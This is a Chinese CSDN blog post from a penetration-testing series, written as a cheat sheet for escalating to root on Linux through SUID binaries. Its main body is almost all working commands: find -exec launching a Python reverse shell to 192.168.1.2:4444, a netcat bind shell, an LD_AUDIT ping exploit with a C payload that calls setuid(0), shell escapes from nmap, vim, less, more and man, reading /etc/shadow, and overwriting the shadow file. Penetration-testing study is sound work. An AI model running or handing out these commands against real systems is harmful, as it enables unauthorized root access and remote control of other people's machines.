WEB渗透Linux提权篇-SUID提权

最新推荐文章于 2024-10-04 21:58:42 发布
最新推荐文章于 2024-10-04 21:58:42 发布
阅读量278 收藏 4
点赞数 10
分类专栏: 渗透测试 文章标签: linux 渗透测试 WEB渗透 网络安全 WEB安全 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141977868
版权

  往期文章

WEB渗透Linux提权篇-提权工具合集-CSDN博客

WEB渗透Linux提权篇-环境变量提权-CSDN博客

WEB渗透Linux提权篇-可写文件提权-CSDN博客

WEB渗透Linux提权篇-查找辅助信息-CSDN博客

WEB渗透Linux提权篇-漏洞提权-CSDN博客

WEB渗透Linux提权篇-通配符提权-CSDN博客

WEB渗透Linux提权篇-Sudo提权-CSDN博客

查找有root权限的SUID文件
$find / -perm -u=s -type f 2>/dev/null
$find / -user root -perm -4000 -print 2>/dev/null
$find / -user root -perm -4000 -exec ls -ldb {} \;
Find
$touch xxx
$/usr/bin/find xxx –exec whoami \;
$/usr/bin/find xxx –exec python -c 'import   socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  \;
&
>find xxx -exec netcat -lvp 12138 -e /bin/sh \; 然后攻击机主动连接
Ping
>cd /tmp
>mkdir exploit
>ln /bin/ping /tmp/exploit/cmd
>exec 3< /tmp/exploit/cmd
>rm -rf /tmp/exploit/
>vim payload.c

void __attribute__((constructor)) init()  // 两个下划线
{
     setuid(0);
     system("/bin/bash");
}

>gcc -W -fPIC -shared -o /tmp/exploit payload.c
>提升到root权限
>LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
>id 查看当前权限
NMAP
# 进入nmap的交互模式
>nmap --interactive 
>!sh
VIM
>vim.tiny /etc/shadow
&
>vim.tiny
# 按ESC
:set shell=/bin/sh
:shell
BASH
>bash –p
More/Less/Man
>less /etc/passwd
!/bin/sh
>more /etc/passwd
!/bin/bash
>man passwd
!/bin/bash
CP/MV
覆盖shadow文件
AutoSUID
https://github.com/IvanGlinkin/AutoSUID/
自动收集 SUID 可执行文件并找到进一步提升权限的方法。100% 自动化。
chmod +x AutoSUID.sh
./AutoSUID.sh
Pluto-2003
关注
专栏目录
WEB安全渗透测试》(27)Linux系统提权-SUID提权
午夜安全
06-14 934
WEB安全渗透测试》(27)Linux系统提权-SUID提权 提权,网络术语,指的是提高自己在服务器中的权限,如从普通用户提高到root用户,当网站被入侵后,攻击者会千方百计的去提高自己的权限,毕竟普通用户能干的事情太有限了。linux中除了r w x 三个权限外(分别代表r 读,w写,x执行),还有两个特殊的权限s 和t,当s权限在文件所有者x权限上时,例如:-rwsr-xr-x,此时称为Set UID,简称为SUID的特殊权限,即当执行该文件时将具有该文件所有者的权限。......
20210411web渗透学习之Linux SUID提权
qq_45290991的博客
04-13 275
Linux下有很多提权方式,,我记得之前我写了一内核提权web渗透学习之Linux内核提权 内核提权最好用也是最通杀的“倚天剑”。。但是实战中很难使用……因为对方不是傻子都会打补丁……所以需要的是suid提权。。测试环境为ubutu15.5 SUIDLinux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。 就相当于说:我在使用这个文件的时候,我有了root权限,,所以一般的思路就
WEB渗透Linux提权-通配符提权
qq_59468567的博客
09-05 318
存在一个定时压缩目录的任务 生成反向shell。即可返回shell 或使用sudoer。低权限登录 查看cron。
WEB渗透Linux提权-MYSQL漏洞提权
qq_59468567的博客
09-06 610
版本 MariaDB < 5.5.52 < 10.1.18 < 10.0.28 MySQL
浅析Linux系统常规提权手段的原理与技巧
道阻且长,行则将至。
01-08 1554
渗透测试过程中,通过 Web 服务漏洞(比如文件上传漏洞)拿到服务器 Shell 后,经常会发现所获得的 Shell 仅有较低的权限,而为了进一步获得高权限 Shell(root),避免不了地就是进一步进行提权。本文来学习、总结下 Linux 系统一些常规的提权手段的原理与技巧。
Linux提权备忘录
weixin_41489908的博客
10-21 1034
如果不是因为真的喜欢你,我纠缠你干嘛,我又何必那么卑微,那么不堪,甚至不停修改自己的底线,到最后变得一文不值。。。 ---- 网易云热评 一、判断是否为虚拟机 cat /proc/scsi/scsi dmesg |grep -i vir w / who 查询目前登录系统的用户 二、辅助工具 1. LinuxSmartEnumeration(参考了LinEnum.sh) 三个工作模式可选: -l 0 (缺省),显示特别重要的信息 -l 1 显示interesting的信息 -l ..
靶机渗透——linux提权
qq_74240553的博客
01-18 567
linux提权的基本背景知识
SUID提权
热门推荐
一只web狗
07-01 1万+
SUID提权介绍
Linux提权第一-Linux内核漏洞提权(以CVE-2015-1328为例)
Love&Share
11-18 4886
文章目录Linux内核漏洞提权拿shell提权附件 Linux内核漏洞提权 一般webshell拿到的权限都是web容器权限,如iis就是iss用户组权限,apache就是apache 权限,可以执行普通命令,但是如果要进行内网渗透就需要拿到系统权限或者超级管理员权限 linux提权首先需要创建交互shell 靶机环境Ubuntu15.04 保证主机与靶机之间可以连通 拿shell 利用已有的web漏洞,如文件上传,命令执行等上传一句话木马,得到交互式shell 假如web界面存在文件上传 测试.
linux提权总结8大类型,30多种方式
09-27
渗透测试安全领域中,Linux提权是一项重要的技能,它能够帮助安全研究人员在发现系统漏洞后进一步提升权限,以便更好地理解系统存在的安全隐患,并采取相应的安全措施。本文档根据给定的文件信息进行了详细的...
20201231WEB渗透学习之Linux内核提权
qq_45290991的博客
01-01 897
我们都知道,如果已经获取了目标服务器(网站)的后门shell,那么我们接下啦要做的事情是什么????对,就是进程迁移(把自己的shell隐藏到一个不容易被肉鸡检测到的地方,比如说一个很深的目录下),但是要执行进程迁移,我们需要root权限,所以实际上我们应该先提升攻击者的权限,来使得我们有着更高的权限(比如说root)去操控肉鸡。在提升权限的过程中,我们常常用到一个能够和肉鸡建立实时会话的TCP工具——————Netcat。网上的教程一般都是先开列出来这个工具的命令,然后后面接上一些实际例子,这样有好处也
20210423web渗透学习之Linux下CRON JOBS 提权
qq_45290991的博客
04-24 638
本文其实介绍了一种很偏僻的提权方式,但是没有前面几mysql udf提权来的鸡肋,因为mysql实战几乎用不上,好吧这个其实也差不多(emmm……),最近出院了,今天多学点东西,五一有5天的假期,终于能够好好学习了,希望领导不要安排太多b事……参考链接:https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ https://xz.aliyun.com/t/2401 https://www.freebuf..
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1329
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
[Linux]从零开始的网站搭建教程
c858845275的博客
10-02 1381
讲解了如何搭建运维面板安装web服务器和搭建一个自己的网站。
Linux】进程地址空间(初步了解)
最新发布
weixin_69380220的博客
10-04 1424
进程虚拟地址空间相关内容
Linux】进程+权限管理+软硬链接+其他命令
weixin_71491685的博客
10-01 1311
cat /etc/passwd 用户信息文件,用户列表(用户名、用户密码占位符、用户编号uid、用户所在组的编号gid、用户备注说明、用户家目录位置、用户的登陆方式)(8)删除软链接并不影响被指向的文件,但若被指向的原文件被删除,则相关软连接被称为死链接(即 dangling link,若被指向路径文件被重新创建,死链接可恢复为正常的软链接)。ps -aux (用户、进程编号、cpu使用率、内存使用率、虚拟内存的大小、真实内存的大小、终端、状态、启动时间、运行时长)
黑马linux笔记(转载)
pscool的博客
10-01 1957
我们所熟知的计算机是由硬件和软件组成的。计算机系统中由电子、机械和光电元件等组成的各种物理装置的总称。(看的见、摸得着的东西:CPU、内存硬盘、显示屏、鼠标等)是用户和计算机硬件之间的接口和桥梁,用户通过软件和计算机进行交流。(操作系统,就是软件的一类)学习Linux系统,就需要有一个可用的Linux系统。由于Linux系统并不适合日常办公使用,所以我们需要借助虚拟机来获得可用的Linux系统环境进行学习。借助虚拟化技术,我们可以在系统中,通过软件:模拟计算机硬件,并给虚拟硬件安装真实的操作系统。
Linux的基本指令(2)
shylyly_的博客
10-01 1065
Linux的基本指令(2) man nano cp mv which 自制指令 alias echo cat tac > >> < more less head tail |(管道)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值